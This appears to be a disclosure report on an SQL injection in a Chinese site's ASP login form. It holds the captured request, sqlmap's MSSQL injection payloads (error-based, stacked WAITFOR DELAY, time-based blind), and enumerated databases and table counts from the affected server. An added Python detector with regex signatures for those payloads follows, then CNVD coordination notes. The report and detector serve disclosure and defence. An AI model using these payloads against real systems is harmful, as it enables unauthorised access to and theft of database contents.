2015-11-30: Details reported to the vendor, awaiting vendor handling
2015-12-04: Vendor confirmed; details disclosed to the vendor only
2015-12-14: Details disclosed to core white hats and relevant domain experts
2015-12-24: Details disclosed to regular white hats
2016-01-03: Details disclosed to intern white hats
2016-01-18: Details disclosed to the public

As per the title.
POST /index.asp HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://**.**.**.**/index.asp
Cookie: ASPSESSIONIDASCRTDQR=FKKHDDOAKOMAPIBGLJCDJHKE
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

username=123456&userpass=1&B1=%B5%C7++%C2%BC

At the login form.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: username=123456' AND 8202=CONVERT(INT,(SELECT CHAR(113) CHAR(120) CHAR(122) CHAR(107) CHAR(113) (SELECT (CASE WHEN (8202=8202) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(107) CHAR(106) CHAR(113) CHAR(113))) AND 'VCxj'='VCxj&userpass=1&B1=%B5%C7 %C2%BC

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: username=123456';WAITFOR DELAY '0:0:5'--&userpass=1&B1=%B5%C7 %C2%BC

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: username=123456' WAITFOR DELAY '0:0:5'--&userpass=1&B1=%B5%C7 %C2%BC
---
[12:10:52] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
[12:10:52] [INFO] fetching database names
[12:10:53] [INFO] heuristics detected web page charset 'GB2312'
[12:10:53] [INFO] the SQL query used returns 11 entries
[12:10:55] [INFO] fetching number of databases
[12:10:55] [WARNING] time-based comparison requires larger statistical model, please wait..................
[12:11:09] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
11
[12:11:24] [INFO] retrieved:
[12:11:30] [INFO] adjusting time delay to 4 seconds due to good response times
5287835
[12:13:19] [INFO] retrieved: ERP
[12:14:04] [INFO] retrieved: master
[12:15:41] [INFO] retrieved: model
[12:17:12] [INFO] retrieved: msdb
[12:18:19] [INFO] retrieved: Northwind
[12:21:11] [INFO] retrieved: pubs
[12:22:25] [INFO] retrieved: tempdb
[12:24:14] [INFO] retrieved: whdata
[12:25:55] [INFO] retrieved: whqsi
[12:27:22] [INFO] retrieved: xxsgddz
available databases [11]:
[*] 5287835
[*] ERP
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] whdata
[*] whqsi
[*] xxsgddz
Database: whqsi
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| dbo.tm             | 248136  |
| dbo.nj_jgdm        | 32433   |
| dbo.[nj_jgdm---]   | 29566   |
| dbo.xtcy_nj        | 27784   |
| dbo.xtcy           | 14872   |
| dbo.xtcy_chanpin   | 13941   |
| dbo.nj_px          | 9495    |
| dbo.xtcy070110     | 6600    |
| dbo.nj_ebank       | 3868    |
| dbo.nj_zycp        | 2924    |
| dbo.nj_user        | 2768    |
| dbo.xjjhy          | 1199    |
| dbo.nj_jjhy        | 1047    |
| dbo.spbq           | 493     |
| dbo.nj_gj          | 237     |
| dbo.nj_info        | 96      |
| dbo.nj_net         | 96      |
| dbo.nj_hb          | 34      |
| dbo.nj_jjlx        | 30      |
| dbo.sysconstraints | 15      |
| dbo.nj_jglx        | 12      |
| dbo.dtproperties   | 9       |
| dbo.nj_xzqh        | 6       |
| dbo.tm_user        | 6       |
| dbo.nj_b2b         | 5       |
| dbo.syssegments    | 3       |
+--------------------+---------+
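As an added defender-side example (not part of the original report): a small Python checker that decodes the login form body the way this GB2312 server would and flags the three injection shapes sqlmap reported for the `username` parameter. The signature names, regexes and sample bodies are constructed for this example, not taken from the report.

```python
import re
from urllib.parse import parse_qsl

# Constructed signatures for the MSSQL injection shapes reported above:
# error-based CONVERT/CHAR probe, stacked WAITFOR DELAY, time-based blind.
# Names, regexes and thresholds are this example's own assumptions.
SIGNATURES = {
    "mssql_time_delay": re.compile(r"WAITFOR\s+DELAY\s+'[\d:]+'", re.I),
    "mssql_error_convert": re.compile(r"CONVERT\s*\(\s*INT\s*,", re.I),
    "char_concat_marker": re.compile(r"(?:CHAR\s*\(\s*\d+\s*\)\s*[+ ]?\s*){4,}", re.I),
    "stacked_query": re.compile(r"'\s*;\s*\w+"),
    "quote_tautology": re.compile(r"AND\s+'(\w+)'\s*=\s*'\1(?!\w)", re.I),
}


def decode_form_body(body: str, charset: str = "gb2312") -> dict:
    """Decode an application/x-www-form-urlencoded body as the server would.

    The captured login request posts GB2312 bytes (B1=%B5%C7++%C2%BC is the
    submit button label), so percent-escapes are decoded with that charset.
    """
    return dict(parse_qsl(body, keep_blank_values=True, encoding=charset, errors="replace"))


def scan_form_body(body: str, charset: str = "gb2312") -> list:
    """Return (parameter, signature) pairs for every decoded value that matches."""
    hits = []
    for name, value in decode_form_body(body, charset).items():
        for sig_name, pattern in SIGNATURES.items():
            if pattern.search(value):
                hits.append((name, sig_name))
    return hits


# Constructed sample bodies: the benign login from the captured request, then
# the three payload shapes sqlmap reported for the username parameter.
BENIGN = "username=123456&userpass=1&B1=%B5%C7++%C2%BC"
ERROR_BASED = ("username=123456%27+AND+8202%3DCONVERT%28INT%2C%28SELECT+CHAR%28113%29%2BCHAR%28120%29"
               "%2BCHAR%28122%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29+AND+%27VCxj%27%3D%27VCxj"
               "&userpass=1&B1=%B5%C7++%C2%BC")
STACKED = "username=123456%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&userpass=1&B1=%B5%C7++%C2%BC"
TIME_BLIND = "username=123456%27+WAITFOR+DELAY+%270%3A0%3A5%27--&userpass=1&B1=%B5%C7++%C2%BC"

if __name__ == "__main__":
    for label, body in [("benign", BENIGN), ("error-based", ERROR_BASED),
                        ("stacked", STACKED), ("time-blind", TIME_BLIND)]:
        print(label, scan_form_body(body))
```

The same checker can run over a web server's request log once the POST bodies are available; on a plain access log only the GET query string is visible, so a login POST like this one would not be caught there.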
Severity: Medium
Vulnerability Rank: 9
Confirmed: 2015-12-04 10:40
CNVD confirmed the situation described and has passed it via CNCERT to the Shandong branch center, which will coordinate handling with the website's administering unit.
None yet.